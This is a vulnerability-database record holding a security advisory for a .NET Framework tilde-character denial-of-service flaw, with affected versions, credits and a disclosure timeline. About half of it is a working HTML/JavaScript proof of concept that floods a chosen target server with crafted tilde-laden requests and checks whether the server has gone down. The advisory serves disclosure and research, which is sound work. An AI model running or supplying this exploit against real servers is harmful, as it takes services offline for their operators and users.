{"lastseen": "2017-11-19T13:40:14", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": -0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "vulnerlab", "idList": ["VULNERABLE:39"]}]}, "exploitation": null, "vulnersScore": -0.6}, "href": "https://www.seebug.org/vuldb/ssvid-73496", "references": [], "enchantments_done": [], "id": "SSV:73496", "title": ".Net Framework Tilde Character DoS", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 5, "sourceData": "\n Paper: http://www.exploit-db.com/wp-content/themes/exploit/docs/19527.pdf\r\n\r\nSecurity Research - .Net Framework Tilde Character DoS\r\n\r\n\r\nWebsite : http://soroush.secproject.com/blog/\r\n\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\n"The .NET Framework is a software framework developed by Microsoft that runs primarily on Microsoft Windows.\r\nIt includes a large library and provides language interoperability\r\nacross several programming languages." (Wikipedia)\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVulnerability Research Team discovered a vulnerability\r\nin Microsoft .NET Framework.\r\n\r\nThe vulnerability is caused by a tilde character "~" in a GET request, which could allow remote attackers\r\nto deny the functionality of the server.\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\n.Net Framework 1.0 Windows XP\r\n.Net Framework 1.1 Windows 2003\r\n.Net Framework 2.0 Windows 2003 R2\r\n.Net Framework 3.0 Windows 2008\r\n.Net Framework 3.5 Windows 2008 R2\r\n.Net Framework 4.0 Windows 2008 R2,Windows 7\r\n\r\n\r\nIV. 
Binary Analysis & Exploits/PoCs\r\n---------------------------------------\r\n\r\nIn-depth technical analysis of the vulnerability and a functional exploit\r\nare available through:\r\n\r\nhttp://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/\r\n\r\n\r\nV. SOLUTION\r\n----------------\r\n\r\nThere are still workarounds through Vendor and security vendors.\r\n\r\nVI. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by:\r\n\r\nSoroush Dalili (@irsdl)\r\nAli Abbasnejad\r\n\r\n\r\nVII. REFERENCES\r\n----------------------\r\n\r\nhttp://support.microsoft.com/kb/142982/en-us\r\nhttp://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2010-08-01 - Vulnerability Discovered\r\n2010-08-03 - Vendor Informed\r\n2010-12-01 - Vendor 1st Response\r\n2011-01-04 - Vendor 2nd Response (next version fix)\r\n2012-06-29 - Public Disclosure\r\n\r\n\r\nProof of Concept:\r\n\r\n<html>\r\n<head>\r\n<script>\r\nvar requestNumber = 10; // enough for the test - otherwise it may stop your .Net framework completely\r\n\r\nvar tempValue = "A";\r\nwhile(tempValue.length<4000){ // 4096 then!\r\n tempValue+=tempValue;\r\n}\r\n\r\nvar errorFlag;\r\nvar from_time;\r\nvar to_time;\r\n\r\nfunction testTheTarget(strTarget,intValidFolderCount,intLoopNumber,HTMLElementDest){\r\n HTMLElementDest.innerHTML = '';\r\n errorFlag = 0;\r\n from_time = new Date(); \r\n from_time = from_time.getTime(); \r\n if (isTargetValid(strTarget)){\r\n if (isNaN(intValidFolderCount)) intValidFolderCount = 100;\r\n if (isNaN(intLoopNumber)) intLoopNumber = 100;\r\n requestNumber = intLoopNumber;\r\n \r\n\t\tvar div = document.createElement("div");\r\n\t\t\r\n for(var i=0; i<requestNumber;i++){\r\n var testTempValue = tempValue.substring(0,intValidFolderCount-1);\r\n testTempValue = 
testTempValue.replace(/A/gi,"/~"+Math.floor(Math.random()*10)+"");\r\n testTempValue+=".AsPx?aspxerrorpath=/";\r\n testTempValue="/"+(new Date()).getMilliseconds()+"~"+Math.floor(Math.random()*10) + testTempValue\r\n var img = createElement("img","img_"+i);\r\n if(i==requestNumber-1)\r\n {\r\n img.onerror = function(){\r\n to_time = new Date(); \r\n to_time = to_time.getTime(); \r\n var msecs = (to_time - from_time); \r\n if(!errorFlag && msecs < 100*requestNumber+5000){\r\n errorFlag = 1;\r\n if(intValidFolderCount>=150)\r\n alert('As you can see this message, you probably need to decrease the Maximum Valid Folder number.');\r\n else if(intValidFolderCount>=50){\r\n alert('First increase the Maximum Valid Folder number to see the behaviour, then decrease it to lower than '+intValidFolderCount+' and then see the behaviour.');\r\n }else\r\n alert('The response was too quick. This server probably is not vulnerable.');\r\n }}\r\n }\r\n img.src = strTarget + testTempValue;\r\n div.appendChild(img);\r\n }\r\n HTMLElementDest.appendChild(div); \r\n }else{\r\n alert('Your target URL is not valid. Examples: \\nhttp://www.aspnet-example.com/ \\nor \\nhttps://www.aspnet-example.com/');\r\n }\r\n};\r\n\r\nvar myTargetWindow;\r\nvar objSetTimeout;\r\nfunction openInNewWin(strTarget){\r\n clearTimeout(objSetTimeout);\r\n if(isTargetValid(strTarget)){\r\n myTargetWindow = window.open(strTarget,'_blank');\r\n objSetTimeout = setTimeout('isServerAlive()',10000);\r\n }\r\n}\r\n\r\nfunction isServerAlive(){\r\n try{\r\n var dummy = myTargetWindow.location;\r\n if(myTargetWindow.location.toString().indexOf('//localhost') < 0)\r\n alert('No response from the server! Seems dead to me!');\r\n }catch(e){\r\n // Nothing ... it is alive and safe... 
\r\n }\r\n}\r\nfunction isTargetValid(strTarget){\r\n var result = false;\r\n try{\r\n if(strTarget.substring(0,7).toLowerCase() == "http://" || strTarget.substring(0,8).toLowerCase() == "https://"){\r\n result = true;\r\n }\r\n }catch(e){}\r\n return result;\r\n};\r\n\r\nfunction createElement(elmType,elmName){\r\n var element;\r\n if(elmName=='')\r\n {\r\n element = document.createElement(elmType);\r\n } else\r\n {\r\n try\r\n {\r\n element = document.createElement('<'+elmType+' name="'+elmName+' id="'+elmName+'">');\r\n } catch (ex)\r\n {\r\n element = document.createElement(elmType);\r\n element.name=elmName;\r\n element.id=elmName;\r\n };\r\n };\r\n return element;\r\n};\r\n\r\n</script>\r\n</head>\r\n\r\n<body>\r\nYou have to monitor the server performance manually:<br/>\r\nTarget website: <input type="text" name="target" id="target" value="http://localhost/"/> Example: http://www.aspnet-example.com/ or https://www.aspnet-example.com/ - Do not include filename<br/>\r\nMaximum valid folder that can be added to your target: <input type="text" name="validfoldercount" id="validfoldercount" value="200"/> before receiving URL Too Long error<br/>\r\nLoop Number: <input type="text" name="loopnumber" id="loopnumber" value="100"/> be careful as it can kill your server.<br/>\r\n<input type="button" value="Test it" onclick="testTheTarget(document.getElementById('target').value,document.getElementById('validfoldercount').value,document.getElementById('loopnumber').value,document.getElementById('playground'))"/>\r\n<input type="button" value="Open the target website" onclick="openInNewWin(document.getElementById('target').value)"/><br/>\r\n<div style="visibility:hidden;" name="playground" id="playground">\r\nHidden Div! -playground-\r\n</div>\r\n<br/><br/><br/><br/>\r\nWe do not accept any responsibility for bad usage of this PoC. 
Please only run it against your own server/websites.\r\n<br/><br/>\r\nMain reference: <a href="http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/">http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/</a>\r\n</body>\r\n</html>\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-73496", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645555853, "score": 1659785532, "epss": 1678848988}}